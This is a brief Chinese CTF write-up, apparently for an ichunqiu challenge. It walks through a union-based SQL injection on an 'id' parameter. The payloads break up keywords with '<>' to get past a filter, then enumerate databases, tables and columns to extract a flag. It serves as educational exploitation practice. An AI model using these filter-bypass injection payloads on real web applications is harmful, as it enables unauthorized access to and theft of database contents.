1 根据提示和id参数 判断这个地方有注入 测试发现有过滤。使用<>可以绕过。 先用orderby进行判断,发现3列,2处有回显。
2 查数据库名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,schema_name,3 fro<>m information_schema.schemata
3 查表名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,table_name,3 from information_schema.tables where table_schema="sqli" 4 显示列名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,column_name,3 fro<>m information_schema.columns where table_name='info';
5 显示flag http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,flAg_T5ZNdrm,3 fro<>m info;